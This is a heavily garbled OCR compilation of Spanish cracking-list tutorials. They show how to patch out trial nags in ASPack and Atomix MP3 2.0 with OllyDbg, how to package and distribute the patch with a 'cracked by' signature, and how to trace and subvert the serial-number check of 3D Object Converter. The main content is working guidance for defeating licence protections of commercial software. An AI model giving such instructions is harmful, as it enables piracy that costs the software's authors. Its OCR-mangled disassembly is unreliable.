83Ca 30 

B2 B4F54300 
ES DS46FCFF 
Ai 30564400 
C74B 5C 881300 
8B45 FC 

Có6sa 6cosaaaa 
8B45 FC 

2830 E4B20000 


Có4a 26 Ba 
ES 


y 


ID 


Y 
Y 


Podol 
¡DO 


E 


Tal 


Stack SS: [0012FE28]1-00ARSO! 
EDX=060AR6B81B, (ASCII ” days” 


MOU EDX, DWORD PTR 
POP 


LEA EAXx, DWORD PTR 
MOU EDX, 43F4F4 


OEA DUERO Pra 


LEA EDx, DWORD PTR 
XOR EAX, EAX 


MOU EAX, DWORD PTR 
LEA EDX, DWORD PTR 


MOU EDX, DWORD PTR 
MOU EAX, DWORD PTR 
ADD EAX, 30 

MOU ECX, 43F504 


MOU EAX, DWORD PTR 


MOU DWORD PTR DS: [EAX+5C], 1388 


MOU EAX, DWORD_PTR 


SS: [EBP-20] 
SS: [EBP-28] 
SS: [EBP-28] 
SS: [EBP-30] 
SS: [EBP-30] 


SS: [EBP-2C] 


SS: [EBP-2C] 
DS: [445630] 


DS: [445630] 
SS: [EBP-4] 


MOU BYTE PTR DS: [EAX+30C],0 


MOU EAX, DWORD PTR 


MOU EAX, DWORD _PTR_DS: [EAX+2E4] 
BYTE _PTR DS: [EAX+207,0 


EDX + EDX 


ANA 


Runt i 


SS: [EBP-4] 


TASCIL "UNREGISTEREDIOO day3"") 


A 


dumpeado. 00403680 
ASCII ” days” 

dunmpeado. 004036B0 
dumpeado. 60413160 
dumpeado. 004B823AC 


dumpeado. 60406178 


ASCII "Aspack.h Lp” 
dumpeado. B04B36F4 


0043F 400 


B empty 
empty 

empty BO 
Empty 
empty * 
empty 
empty 
empty 


FST 48 
FCW 62 


(M5 


Pointer to next SEH record 
SE handler 
1312FES50 


RETURN to ntdll 
dumpeado. B043ES0 


11 ”UNREGI 
dumpe 34: 
dumpe 


Bueno pues estuve haciendo pruebas y la forma que me funciono fue nopear los dos 
CALLs que están justo debajo del BP y con eso ya no salen los días. 
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< EOS ELA+DOTLrTr LALL UUITUIDDO DU MIE SUD. UIT A] HE 
an 8D45 DS LEA EAX, DWORD PTR SS: [EBP-28] dd 
ga 58 PUSH_EAX SL 
50 8D55 D4 LEA EDx, DWORD PTR SS: [EBP-2C] EC 
Al 00494400 — [MOU EAX, DWORD PTR DS: [444900] EE 
ES 4F6DFCFF | CALL -BB4BSDZ4 dumpeado. B0405D24 ES 
8BS5 D4 MOU EDx, DWORD PTR SS: [EBP-2C] EE 
58 POP EAX < 
ES D246FCFF — |CALL BA4036B0 dumpeado. 00493680 5 
8045 DS LEA EAX, DWORD PTR SS: [EBP-28] 
BA F4F44300 — [|MOU EDX, 43F4F4 ASCII" days” El 
98 NOP c 
90 NOP P 
OB4SEFES 90 NOP 4 
98 NOP 2 
El NOP s 
SBS5 DS MOU EDX, DWORD PTR SS: [EBP-28] 7 
8BC3 MO. ER, EBR z 
90 NOP e 
El NOP EF 
20 NOP s 
90 NOP S 
8D55 DA LEA EDX,DWORD PTR SS: [EBP-38] En 
EM] Z0R EAX, EAX ST 
ES AD3SFCFF dumpeado. 604828AC ST 
8845 DG MOU EAX, DWORD PTR SS: [EBP-30] ST 
8D55_D4 LEA EDX, DWORD PTR SS: [EBP-2C] ST 
ES SEZÍFCFF  |CALLAB4A6178 dumpeado. 00406178 ST 
A| 8B55 D4 MOU EDx, DWORD PTR SS: [EBP-2C] d 
90| Al 30564400 — |MOU EAX,DWORD PTR DS: [445630] FS 
12| 8308 38 ADD EAXx, 30 FE 
015| B9 B4F54300 — [|MOU ECX,43F504 ASCII "Aspack.h Lp” 
£ 014] ES DS46FCFF  |CALL-OB4B36F4 dumpeado. B04036F4 
( o1F| Al 36564400__ [MOU EAX,DWORO PTR DS: [445630] 
É 024|  C748 5C 8813001 MOU DWORD PTR DS: [EAX+5C1, 1388 


8B45 FC MOU EAX, DWORD _PTR_SS: [EBP-4] 
Có6s4a BCO30000 1 MOU BYTE PTR DS: [EAX+36C],0 
FC MOU EAX, DWORD PTR SS: [EBP-4] 
23880 E4020000 |MOU EAX, DWORD _PTR_DS: [EAX+2E4] 
2640 20 60 MOU BYTE PTR DS: [EAX+207, 0 


DI 
DOE 
[uz] 
[as] 
La 
n 
<£ 


042|  33D2 20R EDx, EDX = 
04 8B45 FC MOU EAX, DWORD PTR SS: [EBP-4] A 
547]  8B80 7CO20060 |MOU EAX, DWORD PTR DS: CEAX+27C] 

FO4D| ES 824BFDFF CALL 884138D4 dumpeado. 60413504 


Bueno, yo le hice algún que otro cambio más jejeje 


3% ASPack 2.12 


Compresor de Win32 EXE, DLL, OCX 


Registrado a: 
AGUML 
Versión 2.12 


Abrir archivo | Comprimir | Opciones Acerca de | Ayuda | 


supportíMaspack.com 
http: +4wwww. aspack.com 


** Crackeado por £quml **** 


Alexey Solodownikow 
9 1998-2002 


Si se pulsa en donde pone **** Crackeado por Aguml **** te lleva a google 
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Bueno, lo hice para que lo entienda gente tan torpe como yo que empiecen desde O ya 
que la gran mayoría de la comunidad sabe manejarse en esto y no necesitan tantas 
imágenes. 

Pos eso, espero que disfrutéis los Newbies tanto como yo cuando lo destripe. 


ARS LES q EGO 


SE API ROT NITET ID EOI - 
CRSACESLATINTTS e PRACKINP 101001 0nN 


Cracker(?)...Newbie BioHaZarD Fecha: 26/07/09 12:24 a.m. 


Tutorial n2 2 


La verdad que la buena onda que me tiraron en la lista me puso las pilas para volver escribir: 


gracias Ricardo, Solid, NCR y a todos, perdón si no me acuerdo de todos. Voy a hacer algunos 
tutes más de esta serie “Parchando a lo loco” ya que vi que uno de los pibes dijo que tutes 
como estos les servía para practicar. Como siempre digo...PERDON! Jeje a los grosos que 
escriben esos tutes grandiosos que tanto nos ayudan. 


EMPECEMIOS: 


Esto va a ser muy cortito...el enemigo en cuestión es ATOMIX MP3 2.0, que es full por 30 días 
luego de lo cual nos pide un número de serie: 


Número de Serie 


Bienvenido a AtomixMP3 


Por favor, introduzca el número de 
serle proporcionado con su producto. 


II 


Esa ventana de numero de serie es como una pared detrás de la cual esta nuestro tesoro, si la 
pasamos detrás de ella estará el programita full full para nosotros(en realidad el programa no 
me interesa,solo me importa saltarme la protección que tiene). Bueno derribemos la pared. Yo 
particularmente cuando tengo una nag como esta voy haciendo “Animate over (Ctrl+F8)” 
cuando salta la nag miro el Olly y veo en que CALL está parado y le pongo un Breakpoint, doy 
RUN y parara en mi BP, lo quito y entro a la CALL con F7, otra vez hago un Animate Over. Esto 
es para buscar la CALL correcta que hay que nopear;no se si será coincidencia pero por lo 
general a mí siempre me pasa que la CALL correcta es la anterior a una CALL intermodular (en 
este caso es una llamada a USER32,ya lo van a ver).Eso si ANOTEN cada BP que vayan 
poniendo en el orden que los ponen. 

Empecemos con Animate Over (AO) y cuando la nag salta Olly para acá: 


Con F2 le ponemos un BP a esa CALL, reiniciamos Olly (Ctrl+F2), damos RUN y cuando pare en 


el BP que pusimos lo quitamos con F2 y entramos a la CALL con F7;¡nuevamente AO y ahora la 
nag aparece y Olly parará aquí: 


Ponemos BP, reiniciamos Olly y Run, entramos a la CALL y AO y ahora la nag a parece cuando 
para acá: 


Ahí veo la CALL a USER32 y como dije a mi me pasa que la CALL correcta que debo parchar es 
la anterior a la que es intermodular. Entonces laq que voy a nopear va a ser la anterior a 
esta.En mis anotaciones tengo que la anterior es: 


La busco en Olly y la nopeo. O sea situado sobre ella apretó la tecla “espacio” y hago los 
cambios: 


Assemble at 004011F7 Assemble at 004011F7 


[caLt 00401F90| y] NOP y 


IV Fill with NOP's IV Fill with NOP's 


Cancel Cancel 


Guardamos los cambios a el ejecutable: click con el botón derecho, COPY TO EXECUTABLE/ALL 
MODIFICATIONS y en el cuadrito que sale elijo “Copy all”; en la nueva ventana que se abre 
nuevamente click con el derecho y “Save File”.Lo guardo, lo ejecuto y....no anda...naaa 


mentira,era chiste Sl anda: PARED DERRIBADA. 


Arrastre un fichero ' > S y Arrastre un fichero 
en el plato ) J >] 4 e ' en el plato 
para cargarlo , / a Y , A para cargarlo 

/ / , _ SN 


A 


B Escritorio (a Título Pa Bpm | Comentario 
sample songs ¿2 'ONow that love has gone - Cryin in th 
O Now that love has gone [extract] 


EXTRA: Dejando nuestra firma. 


Si quisiéramos dejar nuestra firma como la de la imagen , “Cracked by BhZd” en este caso, 
tendríamos que editar “default.bmp”que está en CArchivos de programalAtomixMP31Skins. 
Yo hice un Patch distribuible con “Patch FX Generator 1.20” y con la ayuda de WinRar se puede 
hacer un SFX para que cuando se ejecute nuestro patch también reemplace default.bmp 
original por el que tiene nuestra firma. Es fácil: 


1- Creamos el Patch con Patch FX Generator 1.20(esta en la web de Ricardo en 
HERRAMIENTAS).Es fácil de usar . 

2- Editamos default.bmp a nuestro gusto 

3- Copiamos ambos archivos a una misma carpeta, los seleccionamos y click con el botón 
derecho, elegimos “Añadir al archivo...”(WinRar). 


4- Enla ventana que se abre tildamos “Crear archivo SFX” 
5- Pinchamos en la solapa “AVANZADO” y luego “Opciones SFX”. 
6- La ruta de extracción tiene que ser la que aparece en la imagen: 


Opciones avanzadas SFX 


General í Llicancia Li Mádulo) 
eneral | Avanzado | Modos Texto e icono | Licencia | Módulo 


Ruta de extracción 


"CMárchivos de programa'AtomixMP34Skins'] 


Tama 


(3) Ruta completa 


Guardar y restaurar rutas 


Programa de instalación 


Ejecutar trás la extracción 
"CAArchivos de programa AtomizMP3SkinsiPatch .EXE" 


Ejecutar antes de la extracción 


Guardar está configuración por defecto 


En “Ejecutar tras la extracción” ponemos la misma ruta que en “Ruta de Extracción” 


agregándole “patch.exe” en mi caso. 
Aceptar y listo! 


Al extraer en Skins se reemplaza el .bmp original por nuestro .bmp editado,una vez hecho esto 
se ejecuta el patch para el programa.Lo iba a hacer metiendo un .bat dentro del SFX pero me 
dio Fiaca. 


Saludos a todo el grupo,fue un tute cortito pero espero que sea de utilidad. 


BIOHAZARD 


Hola a todas/os: 

Hace tiempo que no escribo nada para la Lista, aunque sigo practicando mi “deporte” 
favorito que es, como en el ajedrez, el de buscar los puntos débiles de las “defensas” 
que los programadores generan contra ataques de cualquier intruso en su código. 

Tú puedes llamarle como quieras a este proceder, para mí es cracking puro y duro. 
Cuento con la gran ventaja de que si se ejecuta una vez, la partida acaba en jaque-mate. 
Solo es cuestión de tiempo. 

En esta ocasión encontré un programa que reúne unas cuantas protecciones.Me resultó 
entretenido y espero que le sirva de orientación, al que se inicia en este “deporte”. 

Voy a intentar ir despacito explicando lo que hice, presuponiendo que sabes interpretar 
un desensamblado y te defiendes con el manejo de OllyDbg. 

Aclaro también que el término “flag”, muy usado en el tute, lo adopto para designar una 
variable de tipo booleano (verdadero-falso).Lo translado a bandera y por la fragilidad 
de los booleanos a la hora de proteger, lo dejo en banderilla. 


1.- Presentaciones. 


Se trata de un programa que convierte un gráfico 3D a diversos formatos y se llama 
3dconverter.Lo bajé de http://web.t-online.hu/karpo/. 

El programador confía en que lo pruebes durante 30 días, con ciertas limitaciones a 
la hora de la conversión, pero te da la brasa recomendándote que lo compres. 
Aunque dé la impresión de que a los 30 días expirará, como sucede en otros 
shareware, éste no tiene en cuenta los días transcurridos desde su instalación. 
Tiene otros trucos y por cierto, para ser honesto, mis felicitaciones al autor. 


2.- Análisis. 
Lo instalo y analizo el ejecutable 3dconverter.exe: 


MEA ETE EA» [Borland Delphi( 2.0 - 7.0) 


Veo que ha creado un fichero que se llama register.ini y contiene algo interesante: 
[Registration] 

Registration_Name= 

Serial_Number= 


Lo arranco para conocer un poco su manera de proceder y así sacar la máxima 
información posible, fijándome en todos los detalles.Aparece la típica nag: 


Shareware message 


This is aíriegatercd)opy of the 3D Object Converter for W'indows | 


If you find this program useful you may register ¡t by using 


Moneybookers [send EUR 40 or USD 50 to zoltan.karpatiát-online. hu ] 
PayPal [ send EUR 40 or USD 50 to zoltan.karpatiMt-online.hu ] 
Reg.Net [ Product ID=3DOCNY ] 


Click a OK y sigo recopilando información: 


3D Object Converter y4.20 
, y 


About... 
» 


Me dirijo al About, click y me muestra: 


About Program 


En el mismo menú Help, click en Register y muestra la típica ventana de registro: 


Registration E 


CI 


Pongo mi nick y un número de serie.Le doy a OK: 


' The registration name must be at leas png ! 


Mínimo 8 caracteres; bueno pongo “-Mintaka-", que tiene 9: 
Warning 


' Invalid serial number 
_ 


El porcentaje de acierto sigue siendo muy bajo, jejeje. 
Click en OK y le introduzco un fichero que tengo por ahí: 


Es el carretillo que le robaron a Tena. 
Lo intento guardar, transformándolo a DXF y se niega: 


o x] 
' This save module is not available in th RREGISTERED)node ! 


Esta es la única limitación del programa.Según que tipo de formato sea, no lo va a 
convertir si no estás registrado.Ver en Help>Contents>Registering program. 


Hago lo de siempre (es muy recomendable): creo un par de directorios para 
almacenar el original y los ficheros “retocados”.Así, ante cualquier metedura de 
pata (cosa muy normal en mí), los recupero en su estado anterior al desaguisado. 
Con los datos que tengo me dispongo a iniciar el ataque. 


3.-Afilando las herramientas. 


Información de mi Sistema: Windows XP Personal Service Pack 3. 

Debugger: OllyDbg v1.10, bien armado de plugins anti-todo. 

No voy a contar la odisea del Olly congelándose.El programa se negaba a andar 
dentro de Olly.Comenté el tema con Solid y me dijo que con el Olly2.0, sí andaba. 
Llegué a la conclusión de que ciertos plugins interferían con el programa, ya que 
Olly2.0 no soporta plugins (de momento) y el programa funcionaba bien. 

Total que usé el Ollyv1.10 simple y con solo estos plugins: 


OllyDbg - [CPU] 


[c] File View Debug Options Window Help 


EEES 


1 Command Bar » 
2 MapConw » 


Este Olly me permitirá conocer sus defensas antidebug (si las tuviere). 
El plugin MapConv lo uso para importar nombres (labels) de procedimientos. 
En este caso desensamblo el programa con DeDe y grabo las referencias: 


Exportar Referencias de DeDe en ... 


CO W32DASM 


IV Adicionar referencias de strinas no Inglesas 


TF Procurarreferencias de DSF para “todas 


AR 


.. 


[4 Incluir handlers de eventos 
[4 Incluir referencias de controles 


Cargo el programa y Olly detiene la ejecución en el Entry Point: 


OllyDbg - 3dconvyerter.exe - [CPU - main thread, module 3dconver] 


[c] File View Debug Plugins Options Window Help 


EXPEAQUM epER IR EEs 


PUSH EBP 


5 


3BEC MOU EBP,ESP 
3304 Fa ADD ESP, -15 
53 PUSH EBX 


B3 ES6s36100 MOV EAX, 
ES FFACDFFF 
3B1D E0BF6100 |MOU EBX,DWORD PTR DS: [61BFEO] 
3B03 MOV EAX, DWORD PTR DS: CEBx1 

BB616CA1 ES 927AESFF 


La típica entrada de un programa compilado en Delphi. 
Ejecuto el plugin MapConv y el resultado es que, por ejemplo, cuando llego a: 


EXA ES PUSH EBP ———>>EIP MDÉDEGFC <3dconver.<-TMainFormBRegisterClick> 


En EIP se puede leer el nombre de ese procedimiento y que, en este caso es el click 
en OK de la ventana de registro.Si pongo un BP en ese lugar Olly detiene la 
ejecución ahí y también me lo muestra abajo, a la izquierda: 


Breakpoint at <3dconver.<-TMainFormBR egisterClick> 


Me facilita la interpretación de lo que ejecutan los procedimientos, aunque hay 
algunos nombres que no me dicen nada (posiblemente a los programadores sí). 


4 - Encontrando mi número de serie.... o no. 


Soy muy malo para averiguar mi serial, pero siempre lo intento. 

Asumo, lector, de que te manejas bien con Olly. 

Empiezo buscando referencias a la cadena de texto:"Invalid serial number !" y 
para ello le pido a Olly que me las muestre: 


All constants 
All switches 
All referenced te 


User-defined label 
User-defined comment 


Cuando acaba de buscarlas me sitúo en la primera línea y la selecciono: 


Text strings referenced in 3dconyer:CODE 


Address |Disassembly Text string 
DB4039FE | MOV EDX, 3dconver. 0B483A20 29,” 
0040434 | PUSH 3dconver. 180404424 "soFTWL Follow in Disassembler 
60464303 | PUSH 3dconver. 10404440 "FPUMa 
604565083 MOU ESI, 3dconver. 46617544 ASCII "Runti 
B040513E| PUSH 3dconver. 14617044 ASCII "Runti 
60405159| PUSH 3dconver. 16405194 ASCII "40" 


Toggle breakpoint 


Relleno en el campo de introducción de texto, la palabra/s a buscar: 


I 
Enter text to search for 
[Invalid serial 


Ea 
¡[VW Case sensitive 


| Entire scope 
Olly me muestra donde encontró la cadena con ese texto: 
DO6DEZ44| MOV EAX, Sdconver. O0E6BE348 ¡ASCII "Invalid serial number t” 


Busco por más RESTSTA y no hay ninguna otra coincidencia. 


Doble click en la que encontró y me pongo a estudiar el panorama : 


ABÉDE244 BS 48E36000 MOU EAX, ASCII "Invalid serial number t” 
DO6BE249| ES 9I695ESFF ME SACA EL CARTEL 

BBG6BE24E|. EB 5D VUELVE A REGISTRATION 

BB6BE250. — SB6D EC1CB006 | MOU ECX, DWORD PTR DS: [BB1CECI 


B2 bi MOV DL, 1 


No se ve texto para cuando se acierta con el serial (normalmente dan las gracias). 
Pero a continuación de la línea seleccionada se ven textos que me resultan 
familiares, de cuando le eché un ojo al contenido del fichero register,ini: 


B06BE256.  SEBD EC1CEB0B | MOU ECX, DWORD PTR DS: [BB1CECI 
OB6BE256| B2 61 MOU DL, 1 

ABEBE2538| Al 18684860 [|MOU EAX,DWORD PTR DS: [4803818] 
BOGBE25D0| ES 6626E?FF 

OBÉBEZ62| AS 88148600 — [MOV DWORD PTR DS: [B01488],EAX 


Al 74904300 


MOV EAX, DWORD PTR DS: [A39074] 


2840 04 MOU EAX, DWORD PTR DS: CEAX+4] 
50 PUSH ERAX 
OBGBE270 E9 63E36000 MOU ECX, ASCII "Registrat ion_Name” 
0060£275| BA S4E36060  |MOU EDX, ASCII "Registration” 
AL es148000 — |MOU EAX,DWORD PTR DS: [B01488] 
eB18 MOV EBX, DWORD PTR DS: [EAXJ 
FFS3 04 CALL DWORD PTR DS: [EBx+4] 
AL sos0As0a — |MOU EAX,DWORD PTR DS: [A39080] 
8840 04 MOV EAX, DWORD PTR DS: [EAX+4] 
so PUSH EAX 
BA £4E36000 — |MOU EDX, ASCII "Registration” 
B9 9CE36000 — |MOU ECX, ASCII "Serial_Number” 


MOU EAX, DWORD PTR DS: [B01488] 
MOU EBX, DWORD PTR DS: [EAXI 
CALL DWORD PTR DS: CEBX+4] 


Al 33148000 
8B18 
FFS3 04 


Presumo que si acierto con el serial escribe los datos en el fichero register.ini. 
Al seleccionar la línea grisada queda a la vista donde está ese fichero: 


DS:[00BO0O1CEC]=038A8C10, (ASCII "C:IDocuments and Settings YPropietariol 
EscritorioYretos13dc324201Vregister.ini") 


Jump from 0060E20A 


Y lo más importante es que Olly dice de donde vino (lo destaco en rojo). 

Además, si estoy en lo cierto, usará la API kernel32.WritePrivateProfileStringA para 
poder escribir en ese fichero mis datos de registro. 

Para probarlo voy a ver como engaño al programa para llegar aquí.Para ello voy a 
esa dirección marcada en rojo y veo: 


ES EC12E9FF 


3400 TEST AL, AL 
BDOGBEZOA ../75 44 
BrBÉBE20C AB 5920B000 (MOV AL,BYTE PTR DS: [(B02059] Ñ 
BB6BEZ211 34 61 XOR AL, 1 
BBÉBEZ213 2205 SA20B00€ AND AL,BYTE PTR DS: [BB205A] 
ABÉBE219|.,| 74 15 
BBÉBE21B 5A BB PUSH UM 


Pongo un BP en 0060E203 para entrar en esa call.¿El motivo?.Dependiendo del 
valor que tenga (a la vuelta de la call) el registro AL, me saldrá o no la ventana de 
"Invalid serial number !".Si AL es diferente de cero al llegar a 0OO60E20A saltará a 
0060E250 y no me sacará la ventana.Relleno nuevamente los datos del registro y al 
darle a OK, Olly NO detiene la ejecución en el BP; me vuelve a salir el cartel. 

A ver, algo hago mal.Vuelvo al lugar donde puse el BP y ojeo más arriba: 


ES BAL2E9FF 
2803D S5720B00l CMP BYTE PTR DS: [B02057],0 
E. 75 09 

ES EC12E9FF 
BB6BEZ20S 84C0 TEST AL, AL 
BBÉBE20A|.| 75 44 
os60Ez0c| bas s920B000 |MOU AL,BYTE PTR DS: [B92059] 


Se ve clarito lo que ha sucedido.No ha pasado por el BP, porque el condicional que 
hay justo antes en 0060E201 ha hecho que saltara a 0O60E20C.El culpable es el 
flag (solo puede contener O ó 1) que hay en 00B02057: 


Es BAÍ12E9FF 
DOGUE1FA — S03D S720B00f CMP BYTE PTR DS: [B02057],0 


DS: [B0B020577=01 


Veamos donde lo pone a 1 con Restart y Go to 00B02057 en la ventana de 
memoria.Selecciono el primer byte: 


Hes_dumo Z 
20B02057/68 00 81 9 Search for » 


MOU BYTE PTR DS: [EAXJ, 1 


DS: [OOBD2057]=00 


Memory breakpoint when writing to [D00B02057] 


Esto es para estudiarlo, porque usa mucho lo que hay en 0061C088.Fíjate: 


References in 3dconyer:CODE to 00610088 


Address |Disassembly Comment 

00499060! MOV EAX, DWORD PTR DS: [610688] | [0061C0837-00B902057 
B049A99F | MOV EAX, DWORD PTR DS: [6100688] | [606100388 7-00B02057 
0049F43D| MOU EAX, DWORD PTR DS: [610688] | [0061C0837-00B902057 
0049F511|MO0U EAX, DWORD PTR DS:[61C688] | [0061C0337-00B902057 
BB49FSIE|MOUV EDX, DWORD PTR DS:[61C0887 |(Initial CPU selection) 
DOS32FEF| MOV EAX, DWORD PTR DS: [610688] | [0061C083]7-00B902057 
BBS33072 | MOU EAX, DWORD PTR DS: [6106887] | [0061C088]7-00B02057 
BOSASCODE| MOV EAX, DWORD PTR DS: [6100688] | [6061C08387-00B02057 
006162C3|MOU EAX, DWORD PTR DS: [610688] | [0061C0837-00B02057 
0061644F | MOU EAX, DWORD PTR DS: [6106887] | [0061C088]7-00B02057 


Sigo con Run y ese flag no cambia a cero, por lo que tengo el cartel asegurado. 
Debe haber alguna explicación para que ponga el flag a 1. 

En cualquier caso, le cambiaré el flag Z en la comparación para que llegue a 
0060E203 y listo. 

Entro en esa call con F7 trazando, observando, haciendo pruebas, repitiendo el 
registro hasta que por fin, llego a un lugar donde compara datos que ha estado 
manipulando y obtenidos con mi número de serie: 


8B0D 14BC610/|fM0U ECX, DWORD PTR DS: [618014] 3dconver. BBFSDIBC 
2809 MOV ECX, DWORD PTR DS: [ECXx] 
3B1C31 CMP EBX, DWORD PTR DS: CECX+EAX*4] 
an. TS 25 
an £880D DSCo610/] MOU ECX, DWORD PTR DS: [61C6DS] 3dconver. BBFSDIBS 
1515] 3B09 MOU ECX, DWORD PTR DS: [ECX1 
3B3481 CMP ESI,OWORD PTR DS: CECX+EAx%*4] 
75 18 
20645 FF Bl mou »1 
8B15 ssca610 MOV EDX, DWORD PTR DS: [610088] 3dconver. BOBB2057 
0B49FSA4| C6B2 Ba MOU BYTE PTR DS: [EDXI,0 le 
BB49FSA?| 8B15 94C26108/] MOU EDX,DWORD PTR DS: [610294 3dconver. BBBB205A 
BOB49FSAD| C6B2 Ba MOV BYTE PTR DS: [EDxXJ,0 
BB49FSBO|, EB M4 
DO49FSB2| 48 INC EAX 
BB49FSB3 4 DEC EDXx 
an49FsBa|” 75 ca UNZ SHORT Sdconver.0949F580 


Necesito invertir el flag Z de esos dos saltos condicionales, porque de ello depende 
que ponga el valor cero en la dirección de memoria señalada (la grisada).También 
necesito el 1 que coloca en [EBP-1] en 0049F59A y pasa luego al registro AL: 


BB49FSBB| 64:38910 MOU DWORD PTR FS: CEAXI,EDx 
BB49FSBE — 68 DSFS4900 | PUSH 
BB49FSC3| 8D45 F4 LEA EAX, 
BB4S9FSCE! BA B2000008 | MOU EDX,2 
B049FSCE! ES 64M5DF6FF 

a049FSDO Cc3 

BB49FSD1|* E9 DASEGFEFF 

0049FSD6|” EB EB 

B049FSDS| SA45 FF mMOU AL, 
BB49FSDB| SE POP ESI 
BB49FSDC SB POP EBX 
B049FSDD| SBES MOU ESP,EBP 
BO49FSDF 5D POP EBP 
BB49IFSEO c3 


Cuando pase el RETN, volverá con el valor que necesito en AL: 


amé 84Ca0 TEST AL,AL 

(75 44 
BB6BE20C| | AB 59206000 MOV AL,BYTE PTR DS: [802059] 
v06eEZ 211 34 61 XOR AL, 1 


DOGSEZAS 


ES EC12E9FF 


2205 S5A20B008 
74 15 

5A Ba 

66:8B9D D4E2601 
3302 

B3 24E36000 
ES B495E3FF 
803D 59206000 1 
74 74 
5A 4b 
66:5BB9D D4E2601 
33D2 

ES 48E36000 
ES 9695E3FF 


A1 18084800 
ES 6626E7FF 
AS 38814B000 
Al 74904300 
3840 04 

50 

E9 638E36000 
BA 384E36000 


AND AL,BYTE PTR DS: [BO205A] 


PUSH O 

MOU CX,WORD PTR DS: [60E2D4] 
XOR EDX, EDX 

MOU EAX, 


CMP BYTE PTR DS: [B02059],0 


PUSH O 

MOV CX,WORD PTR DS: [60E£2D4] 
XOR EDX, EDX 

MOU EAX, 


MOV EAX, DWORD PTR DS: [480818] 


MOU DWORD PTR DS: [B014887,EAX 
MOV EAX, DWORD PTR DS: [A39074] 
MOU EAX, DWORD PTR DS: CEAX+4] 
PUSH EAX 


MOV ECX, 
MOU EDX, 


ASCII "Unverified serial number t” 


ASCII "Invalid serial number t” 
ME SACA EL CARTEL 


ABÉBE2 -4E w| EB 5D VUELVE A REGISTRATION 
7 S380D ECiCB060 |MOU ECX,DWORD PTR DS: [BO1CECI 
B2 bi MOV DL, 1 


ASCII "Registrat ion_Name” 
ASCII "Registration” 


Ahora si salta. Recuerda que todo esto lo hago en memoria para comprobar si 
rellena el fichero register.ini con mis datos. 
Antes de dar a Run busco si usa la API kernel32.WritePrivateProfileStringA: 


Found intermodular calls 


Address |Disassembly 
B040D456 | CALL <JMP.tkernel32.WriteFile> 


CALL <JMP.tkernel32.tritePrivateProf ileStringA> 
CALL <JMP.$kernel32.WritePrivateProfileStringA> 
CALL <JMP.Skernel32.WritePrivateProfileStringA> 
CALL <JMP.¿kernel32.tritePrivateProf ileStringA> 


Ahí están y pongo BP en todas ellas y ahora Run.Olly para y veo esto: 


BB438128E CALL to ritePrivateProfileStringA from 3dconver. 100481289 
BIFEFCI4| MBEBESS4 || Section = "Registration” 


BIFBFC1S| MB6BESES || Key = "Registrat ion_Name” 

BIFBFCiC| B38AS5B4 || Strina = "-Mintaka-” 

B1FEFC20| 6B38ASC1O|LFileName = A and Settings*PropietariorEscritorios 
B1FBFC24| B1FBFE9C 


Y luego mi serial chungo: 


BB43123E FCALL to lritePrivateProfileStringA from 3dconver. 00481289 


BIFEFCIA| BMB6BESS4 || Section = "Registrat ion” 

BIFBFC1S| BB6BES9C|] K = "Serial_Number” 

D1FBFCiC| B391CC4B|| String = "A1B2C3D4ESF6” 

B1FEFC20| 638ASC1B|LFi leName = dE and Settingas*PropietariomEscritorio 
B1FBFC24| B1FBFE9C 


Sigo dando Run hasta que queda !Fiunning .Miro en el About: 


About Program xj 


Program version: 4.20 (32 bit, OpenGL] 
Release date: Mar 27, 2008 


Registered to: 
-Mintaka- 


Y en el fichero register. ini : 


A. register.ini - Bloc de notas 


Archivo Edición Formato Yer Ayuda 
[Registration] 


Registration_Name=-Mintaka- 
serial_number=41B2C3D4E5F6 


Mis sospechas eran ciertas. 


5.-Simulando estar registrado. 


Bueno, ahora supongo que cuando vuelva a arrancarlo comprobará el registro y 
para ello usará esta otra API kernel32.GetPrivateProfileStringA para leer los datos. 
Adivino que posteriormente hará comprobaciones, con los datos leídos. 


Hasta ahora habrás notado que no he alterado el ejecutable para nada, porque si lo 
altero, se enfada y saca sus armas, como verás más adelante. 

Si has llegado hasta aquí te mereces un regalo.Es la actualización de la base de 
datos del buscador de teorías de Stzwei y la puedes descargar desde aquí: 


http://www.4shared.com/file/65479500/97dfb732/Actualizacion03102008.html?dirPwd 
Verified=60ddb2f6 


A la Lista la mandaré una semana más tarde.Por gastar tu tiempo leyéndome te la 
ofrezco en primicia. 

Sigo preparando el terreno para cuando lea los datos del fichero register,ini, 
poniendo BP en todas las ocurrencias de la API mencionada anteriormente: 


Found intermodular calls 


Address |Disassembly 

CALL <JMP.tkerne132.GetPrivateProf i leStringA> 
CALL <JMP.¿kerne132.GetPrivateProf i leStringA> 
CALL <JMP.$kernel32.GetPrivateProf ileStringA> 
B64B6D6E| CALL <JMP.kerne 132. GetProcAddress > 


Ahora cierro el Olly.Vuelvo a abrirlo y cargo el programa.Run y se para leyendo en 
el archivo de marras: 


B0438123D 


CALL to GetPrivateProf ileStringA 


BIFEFS7O| BB6BBDBO|| Section = "Registration" 
B1FEFS74| BMB6BBDO4 | Key = "Registrat ion_Name” 
BIFBFS78| 6M04857C1|f Default = ”” 

BIFEBFS7C| BIFBFS94||] ReturnBuffer = BIFBFS94 


Address [Hex dim 222212222 


B1FEFS94|2D 4D 69 6E 74 61 €B 61/2D 00 92 7C 64 AS BS 0u 


-Mintaka-. 


9048123D|f CALL to GetPrivateProfileStringA 


BIFBFS7O| BB6BBDBO|| Section = "Registration” 
B1FEFS74| BBÉBBDCS |] Key = "Serial_Number” 
B1FBFS78| 0064057C1|] Default = ”” 

BIFBFS7C| B1FBFS94|] ReturnBuffer = B1FBFS94 


address [Hex dunas 


B1FEBFS94|41 31 42 32 43 33 44 34 45 35 46 36/08 A3 05 B| A1B2C3D4ESF6.: 


Lee el nombre y el serial que tiene grabados.Tal y como era de suponer hace las 
oportunas comprobaciones del número de serie y yo, como siempre, me pierdo en 
ellas.Me vuelve a sacar la nag inicial y voy a ver el porqué. 

Tengo localizadas las llamadas a : 


Address | Sect | Type | Name 


CODE | User | ->TUnregisteredForm. ShowModal() 
CODE | User | ->TUnregisteredForm. ShowModal () 


Hay que ver como aclara las cosas el plugin Mapconv, ¿eh?. 

Un BP en cada una de ellas hace que se pare cuando va a sacar la nag inicial de 
que si unregistered y bla, bla, bla... 

Y eso ocurre aquí: 


0B613AA3 
Ba613AAC 
00613AB1 
00613AB8 
BO613ABA 
B0613ABF 
BB613AC1 
BOaS13AC3 


bB613AC5 


BaB613AC+ 
BaBS13ACC 
500613AD1 


00613ADB 


Mirando a EIP: 


w 


w 


w 


303D SB20B001 
74 BS 
ES B3BAESFF 


CMP BYTE PTR DS: [B9205B],0 


